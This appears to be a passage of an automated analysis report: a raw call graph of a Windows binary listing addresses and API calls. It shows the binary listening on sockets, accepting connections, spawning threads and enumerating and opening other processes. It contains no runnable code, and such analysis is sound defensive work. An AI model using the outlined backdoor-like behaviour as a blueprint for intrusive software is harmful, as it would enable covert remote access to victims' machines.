38420->38422 38422->38409 38423->38409 38424 2dcbe0 38423->38424 38427 2dcbf1 38424->38427 38430 2dcc23 38427->38430 38433 2dce80 38427->38433 38429 2dcc54 38429->38420 38430->38420 38431->38419 38432->38423 38439 2dd1b0 38433->38439 38435 2dcc43 38438 2dcf40 27 API calls 38435->38438 38437 2d0960 27 API calls 38437->38435 38438->38429 38440 2e057e new 8 API calls 38439->38440 38441 2dceb0 38440->38441 38441->38435 38441->38437 38443 2e057e new 8 API calls 38442->38443 38444 2dc957 38443->38444 38444->38092 38446 2dbf14 38445->38446 38452 2dbf2e 38445->38452 38447 2dbf18 38446->38447 38446->38452 38457 2dbd10 26 API calls 38447->38457 38448 2dbf8f 38448->38077 38451 2dbf1d 38451->38077 38452->38448 38458 2dc0e0 26 API calls 38452->38458 38453->38092 38454->38092 38455->38092 38457->38451 38458->38452 38460 2e057e new 8 API calls 38459->38460 38461 2d281a RtlInitializeCriticalSection 38460->38461 38461->38020 38463 3540b5 38462->38463 38728 3064f0 38463->38728 38465 3540bb 38466 3064f0 64 API calls 38465->38466 38467 3540c6 38466->38467 38468 3064f0 64 API calls 38467->38468 38469 3540d1 38468->38469 38470 3064f0 64 API calls 38469->38470 38471 3540dc 38470->38471 38472 3064f0 64 API calls 38471->38472 38473 3540e7 38472->38473 38474 3064f0 64 API calls 38473->38474 38475 3540f2 38474->38475 38476 3064f0 64 API calls 38475->38476 38477 3540fd 38476->38477 38478 3064f0 64 API calls 38477->38478 38479 354108 38478->38479 38480 3064f0 64 API calls 38479->38480 38481 354113 38480->38481 38482 3064f0 64 API calls 38481->38482 38483 35411e 38482->38483 38484 3064f0 64 API calls 38483->38484 38485 354129 38484->38485 38486 3064f0 64 API calls 38485->38486 38487 354134 38486->38487 38488 3064f0 64 API calls 38487->38488 38489 35413f 38488->38489 38490 3064f0 64 API calls 38489->38490 38491 35414a 38490->38491 38492 3064f0 64 API calls 38491->38492 38493 354155 38492->38493 38494 3064f0 64 API calls 38493->38494 38495 354160 38494->38495 38496 3064f0 64 API calls 38495->38496 38497 35416e 38496->38497 38498 3064f0 64 API calls 38497->38498 38499 354179 __except_handler4 38498->38499 38739 306540 38499->38739 38503 354198 38504 30c520 64 API calls 38503->38504 38505 3541ac 38504->38505 38506 306540 64 API calls 38505->38506 38507 3541b7 38506->38507 38508 30c520 64 API calls 38507->38508 38509 3541cb 38508->38509 38510 30c520 64 API calls 38509->38510 38511 3541df 38510->38511 38512 306540 64 API calls 38511->38512 38513 3541ed 38512->38513 38514 306540 64 API calls 38513->38514 38515 3541f8 38514->38515 38516 306540 64 API calls 38515->38516 38517 354203 38516->38517 38518 306540 64 API calls 38517->38518 38519 35420e 38518->38519 38520 306540 64 API calls 38519->38520 38521 354219 38520->38521 38522 30c520 64 API calls 38521->38522 38523 35422d 38522->38523 38524 30c520 64 API calls 38523->38524 38525 354241 38524->38525 38526 30c520 64 API calls 38525->38526 38527 354255 38526->38527 38528 306540 64 API calls 38527->38528 38529 354260 38528->38529 38763 357ff0 38529->38763 38534 354280 38887 398880 38534->38887 38540 36b2ad 38955 2e56e0 63 API calls 38540->38955 38542 2dd918 38543 2e22f0 38542->38543 39221 2ecfe0 38543->39221 38545 2e22f5 39229 2f53c0 38545->39229 38729 3064f9 38728->38729 38730 3064fd 38728->38730 38729->38465 38823 2f0490 64 API calls __except_handler4 38730->38823 38732 30650c 38733 30c520 64 API calls 38732->38733 38734 306515 38733->38734 38734->38729 38824 2f0360 64 API calls __except_handler4 38734->38824 38736 306530 38737 30c520 64 API calls 38736->38737 38738 306539 38737->38738 38738->38465 38740 306547 38739->38740 38825 2f0490 64 API calls __except_handler4 38740->38825 38742 306552 38743 30c520 64 API calls 38742->38743 38744 30655d 38743->38744 38756 306564 38744->38756 38826 2f0360 64 API calls __except_handler4 38744->38826 38746 30657d 38747 30c520 64 API calls 38746->38747 38748 306586 38747->38748 38748->38756 38827 2f0490 64 API calls __except_handler4 38748->38827 38750 3065a6 38751 30c520 64 API calls 38750->38751 38752 3065af 38751->38752 38752->38756 38828 2f0360 64 API calls __except_handler4 38752->38828 38754 3065cf 38755 30c520 64 API calls 38754->38755 38755->38756 38757 30c520 38756->38757 38758 30c529 38757->38758 38762 30c54b __except_handler4 38757->38762 38829 2ff030 64 API calls __except_handler4 38758->38829 38760 30c530 __except_handler4 38830 2ff030 64 API calls __except_handler4 38760->38830 38762->38503 38831 358270 38763->38831 38765 354268 38766 359b80 38765->38766 38858 3065f0 38766->38858 38769 3065f0 __except_handler4 64 API calls 38770 359b99 38769->38770 38771 3065f0 __except_handler4 64 API calls 38770->38771 38772 359ba8 38771->38772 38773 3065f0 __except_handler4 64 API calls 38772->38773 38774 359bb7 38773->38774 38775 3065f0 __except_handler4 64 API calls 38774->38775 38776 359bc6 38775->38776 38777 3065f0 __except_handler4 64 API calls 38776->38777 38778 359bd5 38777->38778 38779 3065f0 __except_handler4 64 API calls 38778->38779 38780 359be4 38779->38780 38781 3065f0 __except_handler4 64 API calls 38780->38781 38782 359bf3 38781->38782 38783 3065f0 __except_handler4 64 API calls 38782->38783 38784 359c02 38783->38784 38785 3065f0 __except_handler4 64 API calls 38784->38785 38786 359c11 38785->38786 38787 3065f0 __except_handler4 64 API calls 38786->38787 38788 359c20 38787->38788 38789 3065f0 __except_handler4 64 API calls 38788->38789 38790 359c2f 38789->38790 38791 3065f0 __except_handler4 64 API calls 38790->38791 38792 359c3e 38791->38792 38861 306600 38792->38861 38796 359c58 38797 359c78 38796->38797 38876 2ed3c0 63 API calls 2 library calls 38796->38876 38799 306600 64 API calls 38797->38799 38800 359c85 38799->38800 38801 2f3390 64 API calls 38800->38801 38802 359c90 38801->38802 38803 359cb0 38802->38803 38877 2ed3c0 63 API calls 2 library calls 38802->38877 38805 306600 64 API calls 38803->38805 38806 359cbd 38805->38806 38807 359cef 38806->38807 38808 2f3390 64 API calls 38806->38808 38809 306600 64 API calls 38807->38809 38810 359ccf 38808->38810 38811 359cfc 38809->38811 38810->38807 38878 2ed3c0 63 API calls 2 library calls 38810->38878 38869 358150 38811->38869 38814 359d0b 38815 306600 64 API calls 38814->38815 38816 359d30 38815->38816 38817 2f3390 64 API calls 38816->38817 38818 359d3b 38817->38818 38819 306600 64 API calls 38818->38819 38820 359d4a 38819->38820 38821 2f3390 64 API calls 38820->38821 38822 2dd913 38821->38822 38822->38534 38823->38732 38824->38736 38825->38742 38826->38746 38827->38750 38828->38754 38829->38760 38830->38762 38850 2ecf40 63 API calls __except_handler4 38831->38850 38833 358283 38834 358293 38833->38834 38835 358368 38833->38835 38851 2ecf40 63 API calls __except_handler4 38834->38851 38857 2ecf40 63 API calls __except_handler4 38835->38857 38838 3582a6 38852 2ecf40 63 API calls __except_handler4 38838->38852 38839 35837b 38839->38765 38841 3582b9 38842 35834e 38841->38842 38853 2ff030 64 API calls __except_handler4 38841->38853 38856 2ecf40 63 API calls __except_handler4 38842->38856 38845 358364 38845->38765 38846 358343 38855 2ff030 64 API calls __except_handler4 38846->38855 38849 3582d0 __except_handler4 38849->38846 38854 2f2e90 26 API calls 38849->38854 38850->38833 38851->38838 38852->38841 38853->38849 38854->38846 38855->38842 38856->38845 38857->38839 38879 30c620 38858->38879 38860 3065fb 38860->38769 38862 30c620 __except_handler4 64 API calls 38861->38862 38863 30660b 38862->38863 38864 2f3390 38863->38864 38865 2f33ba 38864->38865 38866 2f3398 38864->38866 38865->38796 38884 2e5840 64 API calls __except_handler4 38866->38884 38868 2f33b3 38868->38796 38870 35815a __except_handler4 38869->38870 38885 2f6d50 64 API calls __except_handler4 38870->38885 38872 35817a 38873 3581c3 38872->38873 38886 2f72d0 64 API calls __except_handler4 38872->38886 38873->38814 38875 3581b8 38875->38814 38880 30c62a __except_handler4 38879->38880 38882 30c636 __except_handler4 38880->38882 38883 30c6d0 64 API calls __except_handler4 38880->38883 38882->38860 38883->38882 38884->38868 38885->38872 38886->38875 38956 2e55e0 38887->38956 38922 2e22c0 63 API calls 38923 3988da 38922->38923 39076 39a730 38923->39076 38942 2e5280 __except_handler4 63 API calls 38943 39a94b 38942->38943 38944 354285 38943->38944 39139 2e56e0 63 API calls 38943->39139 38948 2e5280 38944->38948 38946 39a95d 39140 2e56e0 63 API calls 38946->39140 38949 2e528a __except_handler4 38948->38949 38950 2e52cf 38949->38950 39219 2ecf40 63 API calls __except_handler4 38949->39219 38950->38542 38954 2e56e0 63 API calls 38950->38954 38952 2e52a7 39220 2ecf40 63 API calls __except_handler4 38952->39220 38954->38540 38955->38542 38957 2e55e9 38956->38957 38960 2e5624 38956->38960 39160 2ecf40 63 API calls __except_handler4 38957->39160 38959 2e55fc 39161 2ecf40 63 API calls __except_handler4 38959->39161 39141 2e5a10 38960->39141 38963 2e56a5 38964 39a4c0 38963->38964 38965 2e5280 __except_handler4 63 API calls 38964->38965 38967 39a4cb 38965->38967 38966 39888a 38971 39a5b0 38966->38971 38967->38966 39169 2e56e0 63 API calls 38967->39169 38969 39a4dd 39170 2e56e0 63 API calls 38969->39170 38972 2e5280 __except_handler4 63 API calls 38971->38972 38973 39a5bb 38972->38973 38974 39888f 38973->38974 39171 2e56e0 63 API calls 38973->39171 38978 39a5e0 38974->38978 38976 39a5cd 39172 2e56e0 63 API calls 38976->39172 38979 2e5280 __except_handler4 63 API calls 38978->38979 38980 39a5eb 38979->38980 38981 398894 38980->38981 39173 2e56e0 63 API calls 38980->39173 38985 39a6d0 38981->38985 38983 39a5fd 39174 2e56e0 63 API calls 38983->39174 38986 2e5280 __except_handler4 63 API calls 38985->38986 38987 39a6db 38986->38987 38991 398899 38987->38991 39175 2e56e0 63 API calls 38987->39175 38989 39a6ed 39176 2e56e0 63 API calls 38989->39176 38992 39a550 38991->38992 38993 2e5280 __except_handler4 63 API calls 38992->38993 38994 39a55b 38993->38994 38998 39889e 38994->38998 39177 2e56e0 63 API calls 38994->39177 38996 39a56d 39178 2e56e0 63 API calls 38996->39178 38999 39a6a0 38998->38999 39000 2e5280 __except_handler4 63 API calls 38999->39000 39001 39a6ab 39000->39001 39002 3988a3 39001->39002 39179 2e56e0 63 API calls 39001->39179 39006 39a700 39002->39006 39004 39a6bd 39180 2e56e0 63 API calls 39004->39180 39007 2e5280 __except_handler4 63 API calls 39006->39007 39008 39a70b 39007->39008 39012 3988a8 39008->39012 39181 2e56e0 63 API calls 39008->39181 39010 39a71d 39182 2e56e0 63 API calls 39010->39182 39013 39a610 39012->39013 39014 2e5280 __except_handler4 63 API calls 39013->39014 39015 39a61b 39014->39015 39019 3988ad 39015->39019 39183 2e56e0 63 API calls 39015->39183 39017 39a62d 39184 2e56e0 63 API calls 39017->39184 39020 39a760 39019->39020 39021 2e5280 __except_handler4 63 API calls 39020->39021 39022 39a76b 39021->39022 39023 3988b2 39022->39023 39185 2e56e0 63 API calls 39022->39185 39027 39a4f0 39023->39027 39025 39a77d 39186 2e56e0 63 API calls 39025->39186 39028 2e5280 __except_handler4 63 API calls 39027->39028 39029 39a4fb 39028->39029 39030 3988b7 39029->39030 39187 2e56e0 63 API calls 39029->39187 39034 39a790 39030->39034 39032 39a50d 39188 2e56e0 63 API calls 39032->39188 39035 2e5280 __except_handler4 63 API calls 39034->39035 39036 39a79b 39035->39036 39040 3988bc 39036->39040 39189 2e56e0 63 API calls 39036->39189 39038 39a7ad 39190 2e56e0 63 API calls 39038->39190 39041 39a490 39040->39041 39042 2e5280 __except_handler4 63 API calls 39041->39042 39043 39a49b 39042->39043 39047 3988c1 39043->39047 39191 2e56e0 63 API calls 39043->39191 39045 39a4ad 39192 2e56e0 63 API calls 39045->39192 39048 39a580 39047->39048 39049 2e5280 __except_handler4 63 API calls 39048->39049 39050 39a58b 39049->39050 39054 3988c6 39050->39054 39193 2e56e0 63 API calls 39050->39193 39052 39a59d 39194 2e56e0 63 API calls 39052->39194 39055 39a520 39054->39055 39056 2e5280 __except_handler4 63 API calls 39055->39056 39057 39a52b 39056->39057 39058 3988cb 39057->39058 39195 2e56e0 63 API calls 39057->39195 39062 39a640 39058->39062 39060 39a53d 39196 2e56e0 63 API calls 39060->39196 39063 2e5280 __except_handler4 63 API calls 39062->39063 39064 39a64b 39063->39064 39065 3988d0 39064->39065 39197 2e56e0 63 API calls 39064->39197 39069 39a670 39065->39069 39067 39a65d 39198 2e56e0 63 API calls 39067->39198 39070 2e5280 __except_handler4 63 API calls 39069->39070 39072 39a67b 39070->39072 39071 3988d5 39071->38922 39072->39071 39199 2e56e0 63 API calls 39072->39199 39074 39a68d 39200 2e56e0 63 API calls 39074->39200 39077 2e5280 __except_handler4 63 API calls 39076->39077 39078 39a73b 39077->39078 39079 3988df 39078->39079 39201 2e56e0 63 API calls 39078->39201 39083 39a7c0 39079->39083 39081 39a74d 39202 2e56e0 63 API calls 39081->39202 39084 2e5280 __except_handler4 63 API calls 39083->39084 39085 39a7cb 39084->39085 39086 3988e4 39085->39086 39203 2e56e0 63 API calls 39085->39203 39090 39a7f0 39086->39090 39088 39a7dd 39204 2e56e0 63 API calls 39088->39204 39091 2e5280 __except_handler4 63 API calls 39090->39091 39092 39a7fb 39091->39092 39096 3988e9 39092->39096 39205 2e56e0 63 API calls 39092->39205 39094 39a80d 39206 2e56e0 63 API calls 39094->39206 39097 39a820 39096->39097 39098 2e5280 __except_handler4 63 API calls 39097->39098 39099 39a82b 39098->39099 39100 3988ee 39099->39100 39207 2e56e0 63 API calls 39099->39207 39104 39a850 39100->39104 39102 39a83d 39208 2e56e0 63 API calls 39102->39208 39105 2e5280 __except_handler4 63 API calls 39104->39105 39106 39a85b 39105->39106 39107 3988f3 39106->39107 39209 2e56e0 63 API calls 39106->39209 39111 39a910 39107->39111 39109 39a86d 39210 2e56e0 63 API calls 39109->39210 39112 2e5280 __except_handler4 63 API calls 39111->39112 39113 39a91b 39112->39113 39114 3988f8 39113->39114 39211 2e56e0 63 API calls 39113->39211 39118 39a8b0 39114->39118 39116 39a92d 39212 2e56e0 63 API calls 39116->39212 39119 2e5280 __except_handler4 63 API calls 39118->39119 39120 39a8bb 39119->39120 39121 3988fd 39120->39121 39213 2e56e0 63 API calls 39120->39213 39125 39a8e0 39121->39125 39123 39a8cd 39214 2e56e0 63 API calls 39123->39214 39126 2e5280 __except_handler4 63 API calls 39125->39126 39127 39a8eb 39126->39127 39131 398902 39127->39131 39215 2e56e0 63 API calls 39127->39215 39129 39a8fd 39216 2e56e0 63 API calls 39129->39216 39132 39a880 39131->39132 39133 2e5280 __except_handler4 63 API calls 39132->39133 39134 39a88b 39133->39134 39135 398907 39134->39135 39217 2e56e0 63 API calls 39134->39217 39135->38942 39137 39a89d 39218 2e56e0 63 API calls 39137->39218 39139->38946 39140->38944 39162 2ecf40 63 API calls __except_handler4 39141->39162 39143 2e5a23 39144 2e5a2f 39143->39144 39145 2e5a46 39143->39145 39163 2ecf40 63 API calls __except_handler4 39144->39163 39164 2ecf40 63 API calls __except_handler4 39145->39164 39148 2e5a42 39148->38963 39149 2e5a59 39165 2ecf40 63 API calls __except_handler4 39149->39165 39151 2e5a6c 39152 2e5a78 39151->39152 39157 2e5a8f _strncpy 39151->39157 39166 2ecf40 63 API calls __except_handler4 39152->39166 39154 2e5a8b 39154->38963 39156 2e5ae2 39168 2ecf40 63 API calls __except_handler4 39156->39168 39157->39156 39167 385294 26 API calls 3 library calls 39157->39167 39159 2e5aff 39159->38963 39160->38959 39161->38960 39162->39143 39163->39148 39164->39149 39165->39151 39166->39154 39167->39157 39168->39159 39169->38969 39170->38966 39171->38976 39172->38974 39173->38983 39174->38981 39175->38989 39176->38991 39177->38996 39178->38998 39179->39004 39180->39002 39181->39010 39182->39012 39183->39017 39184->39019 39185->39025 39186->39023 39187->39032 39188->39030 39189->39038 39190->39040 39191->39045 39192->39047 39193->39052 39194->39054 39195->39060 39196->39058 39197->39067 39198->39065 39199->39074 39200->39071 39201->39081 39202->39079 39203->39088 39204->39086 39205->39094 39206->39096 39207->39102 39208->39100 39209->39109 39210->39107 39211->39116 39212->39114 39213->39123 39214->39121 39215->39129 39216->39131 39217->39137 39218->39135 39219->38952 39220->38950 39222 2ecfea __except_handler4 39221->39222 39228 2ed0c6 39222->39228 39487 2ed3f0 44 API calls 39222->39487 39224 2ed038 39226 2ed047 ___from_strstr_to_strchr 39224->39226 39488 38551c 42 API calls __except_handler4 39224->39488 39226->39228 39489 38551c 42 API calls __except_handler4 39226->39489 39228->38545 39230 2f53c5 39229->39230 39231 3064f0 64 API calls 39230->39231 39232 2f53cb 39231->39232 39233 3064f0 64 API calls 39232->39233 39234 2f53d6 39233->39234 39235 3064f0 64 API calls 39234->39235 39236 2f53e1 39235->39236 39237 3064f0 64 API calls 39236->39237 39238 2f53ec 39237->39238 39239 3064f0 64 API calls 39238->39239 39240 2f53f7 39239->39240 39241 3064f0 64 API calls 39240->39241 39242 2f5402 39241->39242 39243 3064f0 64 API calls 39242->39243 39244 2f540d 39243->39244 39245 3064f0 64 API calls 39244->39245 39246 2f5418 39245->39246 39247 3064f0 64 API calls 39246->39247 39248 2f5423 39247->39248 39249 3064f0 64 API calls 39248->39249 39250 2f542e 39249->39250 39251 3064f0 64 API calls 39250->39251 39252 2f5439 39251->39252 39253 30c520 64 API calls 39252->39253 39254 2f544d 39253->39254 39255 30c520 64 API calls 39254->39255 39256 2f5461 39255->39256 39257 3064f0 64 API calls 39256->39257 39258 2f546f 39257->39258 39259 30c520 64 API calls 39258->39259 39260 2f5483 39259->39260 39261 30c520 64 API calls 39260->39261 39262 2f5497 39261->39262 39263 3064f0 64 API calls 39262->39263 39264 2f54a2 39263->39264 39265 3064f0 64 API calls 39264->39265 39266 2f54ad 39265->39266 39267 30c520 64 API calls 39266->39267 39268 2f54c1 39267->39268 39269 30c520 64 API calls 39268->39269 39270 2f54d5 39269->39270 39271 3064f0 64 API calls 39270->39271 39272 2f54e0 39271->39272 39273 3064f0 64 API calls 39272->39273 39274 2f54ee 39273->39274 39275 3064f0 64 API calls 39274->39275 39276 2f54f9 39275->39276 39277 3064f0 64 API calls 39276->39277 39278 2f5504 39277->39278 39279 3064f0 64 API calls 39278->39279 39280 2f550f 39279->39280 39281 3064f0 64 API calls 39280->39281 39282 2f551a 39281->39282 39283 3064f0 64 API calls 39282->39283 39284 2f5525 39283->39284 39285 3064f0 64 API calls 39284->39285 39286 2f5530 39285->39286 39287 3064f0 64 API calls 39286->39287 39288 2f553b 39287->39288 39289 3064f0 64 API calls 39288->39289 39290 2f5546 39289->39290 39291 3064f0 64 API calls 39290->39291 39292 2f5551 39291->39292 39293 30c520 64 API calls 39292->39293 39294 2f5565 39293->39294 39295 30c520 64 API calls 39294->39295 39296 2f5579 39295->39296 39297 3064f0 64 API calls 39296->39297 39298 2f5587 39297->39298 39299 3064f0 64 API calls 39298->39299 39300 2f5592 39299->39300 39301 3064f0 64 API calls 39300->39301 39302 2f559d 39301->39302 39303 3064f0 64 API calls 39302->39303 39304 2f55a8 39303->39304 39305 30c520 64 API calls 39304->39305 39306 2f55bc 39305->39306 39307 30c520 64 API calls 39306->39307 39308 2f55d0 39307->39308 39309 3064f0 64 API calls 39308->39309 39310 2f55db 39309->39310 39311 3064f0 64 API calls 39310->39311 39312 2f55e6 39311->39312 39313 3064f0 64 API calls 39312->39313 39314 2f55f1 39313->39314 39315 3064f0 64 API calls 39314->39315 39316 2f55fc 39315->39316 39317 3064f0 64 API calls 39316->39317 39318 2f5607 39317->39318 39319 3064f0 64 API calls 39318->39319 39320 2f5612 39319->39320 39321 30c520 64 API calls 39320->39321 39322 2f5629 39321->39322 39323 30c520 64 API calls 39322->39323 39324 2f563d 39323->39324 39325 3064f0 64 API calls 39324->39325 39326 2f5648 39325->39326 39327 3064f0 64 API calls 39326->39327 39328 2f5653 39327->39328 39329 3064f0 64 API calls 39328->39329 39330 2f565e 39329->39330 39331 3064f0 64 API calls 39330->39331 39332 2f5669 39331->39332 39333 30c520 64 API calls 39332->39333 39334 2f567d 39333->39334 39335 30c520 64 API calls 39334->39335 39336 2f5691 39335->39336 39337 30c520 64 API calls 39336->39337 39338 2f56a8 39337->39338 39339 3064f0 64 API calls 39338->39339 39340 2f56b3 39339->39340 39341 3064f0 64 API calls 39340->39341 39342 2f56be 39341->39342 39343 3064f0 64 API calls 39342->39343 39344 2f56c9 39343->39344 39345 3064f0 64 API calls 39344->39345 39346 2f56d4 39345->39346 39347 30c520 64 API calls 39346->39347 39348 2f56e8 39347->39348 39349 30c520 64 API calls 39348->39349 39350 2f56fc 39349->39350 39351 30c520 64 API calls 39350->39351 39352 2f5710 39351->39352 39353 30c520 64 API calls 39352->39353 39354 2f5727 39353->39354 39355 3064f0 64 API calls 39354->39355 39356 2f5732 39355->39356 39357 3064f0 64 API calls 39356->39357 39358 2f573d 39357->39358 39359 3064f0 64 API calls 39358->39359 39360 2f5748 39359->39360 39361 3064f0 64 API calls 39360->39361 39362 2f5753 39361->39362 39363 3064f0 64 API calls 39362->39363 39364 2f575e 39363->39364 39365 3064f0 64 API calls 39364->39365 39366 2f5769 39365->39366 39367 3064f0 64 API calls 39366->39367 39368 2f5774 39367->39368 39369 3064f0 64 API calls 39368->39369 39370 2f577f 39369->39370 39371 3064f0 64 API calls 39370->39371 39372 2f578a 39371->39372 39373 3064f0 64 API calls 39372->39373 39374 2f5795 39373->39374 39375 3064f0 64 API calls 39374->39375 39376 2f57a0 39375->39376 39377 30c520 64 API calls 39376->39377 39378 2f57b4 39377->39378 39379 30c520 64 API calls 39378->39379 39380 2f57cb 39379->39380 39381 3064f0 64 API calls 39380->39381 39382 2f57d6 39381->39382 39487->39224 39488->39226 39489->39228 39598 2d22aa 39597->39598 39605 2d4e40 39598->39605 39618 2d7760 39598->39618 39632 2deef0 39598->39632 39652 2d3610 socket 39598->39652 39599 2d22b1 39606 2d4e7e 39605->39606 39607 2d5029 39605->39607 39681 2d1c10 socket 39606->39681 39609 2e056d CatchGuardHandler 5 API calls 39607->39609 39610 2d5041 39609->39610 39610->39599 39611 2d4eaa accept 39617 2d4e8d 39611->39617 39612 2e057e new 8 API calls 39612->39617 39613 2d4f93 39614 2d4f99 CreateThread 39613->39614 39615 2d4fb2 ResumeThread 39613->39615 39614->39615 39615->39617 39617->39607 39617->39611 39617->39612 39617->39613 39693 2d2550 27 API calls 39617->39693 39631 2d77c4 39618->39631 39619 2d7b2a GetNativeSystemInfo 39626 2d7b7e 39619->39626 39620 2d7bf8 39621 2e056d CatchGuardHandler 5 API calls 39620->39621 39623 2d7c21 39621->39623 39623->39599 39624 2d0860 27 API calls 39624->39631 39626->39620 39629 2d7c55 Sleep 39626->39629 39694 2d7200 39626->39694 39720 2d6d60 39626->39720 39628 2d7cf0 27 API calls 39628->39631 39629->39626 39630 37f981 26 API calls 39630->39631 39631->39619 39631->39624 39631->39628 39631->39630 39740 2e0994 5 API calls ___report_securityfailure 39631->39740 39633 2de750 60 API calls 39632->39633 39650 2def2a 39633->39650 39634 2df3cf 39635 2e056d CatchGuardHandler 5 API calls 39634->39635 39636 2df3e7 39635->39636 39636->39599 39639 2def73 Sleep 39639->39650 39640 2dcbe0 27 API calls 39640->39650 39641 2df3ca 39905 37f981 26 API calls __wsopen_s 39641->39905 39643 3795d0 26 API calls 39643->39650 39646 2df289 Sleep 39647 2df299 39646->39647 39646->39650 39647->39650 39648 2d0420 26 API calls 39648->39650 39649 2d0960 27 API calls 39649->39650 39650->39634 39650->39639 39650->39640 39650->39641 39650->39643 39650->39646 39650->39648 39650->39649 39651 2df3f0 27 API calls 39650->39651 39806 2deab0 39650->39806 39882 2df570 27 API calls 39650->39882 39883 379270 39650->39883 39891 3794d0 39650->39891 39651->39650 39653 2d368e htons inet_addr setsockopt bind 39652->39653 39654 2d3684 39652->39654 39655 2d3689 39653->39655 39656 2d3715 listen 39653->39656 39657 380e9e __dosmaperr 20 API calls 39654->39657 39659 2e056d CatchGuardHandler 5 API calls 39655->39659 39658 2d3b36 closesocket 39656->39658 39663 2d3751 ___scrt_fastfail 39656->39663 39657->39655 39658->39655 39660 2d3b51 39659->39660 39660->39599 39661 2d377d ioctlsocket accept 39662 2d37de select 39661->39662 39661->39663 39662->39663 39665 2d3811 getsockopt 39662->39665 39663->39658 39663->39661 39664 2d3856 ioctlsocket 39663->39664 39664->39663 39666 2d3878 recv 39664->39666 39665->39664 39672 2d38a0 39666->39672 39667 2d3a9c closesocket 39667->39663 39668 2d0860 27 API calls 39668->39672 39670 2d3b02 closesocket 39670->39663 39671 2d0960 27 API calls 39671->39672 39672->39667 39672->39668 39672->39671 39673 2d3b55 39672->39673 39674 2d0420 26 API calls 39672->39674 39944 2df3f0 27 API calls CatchGuardHandler 39672->39944 39945 37f981 26 API calls __wsopen_s 39673->39945 39674->39672 39682 2d1c4f inet_addr htons bind 39681->39682 39683 2d1c37 GetLastError 39681->39683 39685 2d1cc2 listen 39682->39685 39686 2d1ca2 GetLastError closesocket 39682->39686 39684 2e056d CatchGuardHandler 5 API calls 39683->39684 39687 2d1c4b 39684->39687 39685->39686 39689 2d1cd0 39685->39689 39688 2e056d CatchGuardHandler 5 API calls 39686->39688 39687->39617 39691 2d1cbe 39688->39691 39690 2e056d CatchGuardHandler 5 API calls 39689->39690 39692 2d1d02 39690->39692 39691->39617 39692->39617 39693->39617 39695 37e1a0 ___scrt_fastfail 39694->39695 39696 2d7240 CreateToolhelp32Snapshot 39695->39696 39697 2d7259 Process32First 39696->39697 39698 2d72a0 39696->39698 39699 2d7299 CloseHandle 39697->39699 39719 2d72b0 ___scrt_fastfail 39697->39719 39700 2e056d CatchGuardHandler 5 API calls 39698->39700 39699->39698 39702 2d76f1 39700->39702 39701 2d76b5 Process32Next 39703 2d76d1 CloseHandle 39701->39703 39701->39719 39702->39626 39703->39698 39704 2d0420 26 API calls 39704->39719 39705 2d753d OpenProcess 39706 2d7554 K32GetModuleFileNameExA 39705->39706 39705->39719 39706->39719 39707 2d76f5 39743 2e0994 5 API calls ___report_securityfailure 39707->39743 39709 2d76fa 39744 37f981 26 API calls __wsopen_s 39709->39744 39710 2d0860 27 API calls 39710->39719 39712 2d75a6 CloseHandle 39712->39719 39714 383728 26 API calls 39714->39719 39716 2d7cf0 27 API calls 39716->39719 39717 2d7580 ___scrt_fastfail 39717->39712 39741 2d6370 56 API calls 3 library calls 39717->39741 39719->39698 39719->39701 39719->39704 39719->39705 39719->39707 39719->39709 39719->39710 39719->39712 39719->39714 39719->39716 39719->39717 39742 383442 46 API calls 2 library calls 39719->39742 39721 2d6da7 ___scrt_fastfail 39720->39721 39722 2d8480 8 API calls 39721->39722 39723 2d6dc3 GetCurrentProcessId CreateToolhelp32Snapshot 39722->39723 39724 2d6df0 Process32First 39723->39724 39727 2d6de8 39723->39727 39725 2d6e0c CloseHandle 39724->39725 39731 2d6e41 39724->39731 39725->39727 39726 2d6e9e Process32Next 39728 2d6eb0 CloseHandle 39726->39728 39726->39731 39732 2e056d CatchGuardHandler 5 API calls 39727->39732 39745 2d6b20 39728->39745 39731->39726 39794 2d8530 27 API calls 39731->39794 39733 2d704b 39732->39733 39733->39626 39735 2d6ecb 39735->39727 39738 2d6f47 39735->39738 39751 2d65c0 39735->39751 39797 2d8530 27 API calls 39735->39797 39738->39735 39795 2d69e0 329 API calls 3 library calls 39738->39795 39796 2d8530 27 API calls 39738->39796 39740->39631 39741->39717 39742->39719 39743->39709 39746 2d6b54 39745->39746 39748 2d6c65 39745->39748 39747 2d8480 8 API calls 39746->39747 39746->39748 39750 2d6b74 39747->39750 39748->39735 39750->39748 39798 2d8530 27 API calls 39750->39798 39752 2d660e ___scrt_fastfail 39751->39752 39753 2d662d OpenProcess 39752->39753 39773 2d674e 39752->39773 39754 2d6645 K32GetModuleFileNameExA 39753->39754 39753->39773 39758 2d6690 ___scrt_fastfail 39754->39758 39755 2e056d CatchGuardHandler 5 API calls 39756 2d69d5 39755->39756 39756->39735 39757 2d66c4 CloseHandle 39759 2d66e0 39757->39759 39758->39757 39799 2d6370 56 API calls 3 library calls 39758->39799 39759->39759 39761 2d66fc 39759->39761 39762 2d66ee GetLastError 39759->39762 39764 383728 26 API calls 39761->39764 39762->39773 39763 2d66c1 39763->39757 39765 2d6720 39764->39765 39766 2d6758 GetFileVersionInfoSizeA 39765->39766 39800 2d5f30 47 API calls CatchGuardHandler 39765->39800 39769 2d679a ___scrt_fastfail 39766->39769 39766->39773 39768 2d674a 39768->39766 39768->39773 39770 2d67bc GetFileVersionInfoA 39769->39770 39769->39773 39771 2d67d8 ___scrt_fastfail 39770->39771 39770->39773 39772 2d67f5 73EE1500 39771->39772 39772->39773 39774 2d6826 39772->39774 39773->39755 39775 2d5bf0 50 API calls 39774->39775 39776 2d686f 39775->39776 39801 2d1b70 27 API calls 39776->39801 39778 2d6882 39802 2d03a0 27 API calls 39778->39802 39780 2d689b 39803 2d03a0 27 API calls 39780->39803 39782 2d68ab 73EE1500 39783 2d68df 39782->39783 39784 2d693a GetLastError 39782->39784 39804 2d1b70 27 API calls 39783->39804 39785 2d6944 39784->39785 39788 2d0420 26 API calls 39785->39788 39787 2d68f0 39805 2d5f30 47 API calls CatchGuardHandler 39787->39805 39788->39773 39790 2d6917 39791 2d0420 26 API calls 39790->39791 39792 2d6928 39791->39792 39793 2d0420 26 API calls 39792->39793 39793->39773 39794->39726 39795->39738 39796->39738 39797->39735 39798->39750 39799->39763 39800->39768 39801->39778 39802->39780 39803->39782 39804->39787 39805->39790 39807 2deb18 ___scrt_fastfail 39806->39807 39808 379180 8 API calls 39807->39808 39809 2deb26 39808->39809 39810 2de070 30 API calls 39809->39810 39811 2deb57 39810->39811 39812 3795d0 26 API calls 39811->39812 39813 2deb83 39812->39813 39814 2de5d0 29 API calls 39813->39814 39815 2deb8e 39814->39815 39816 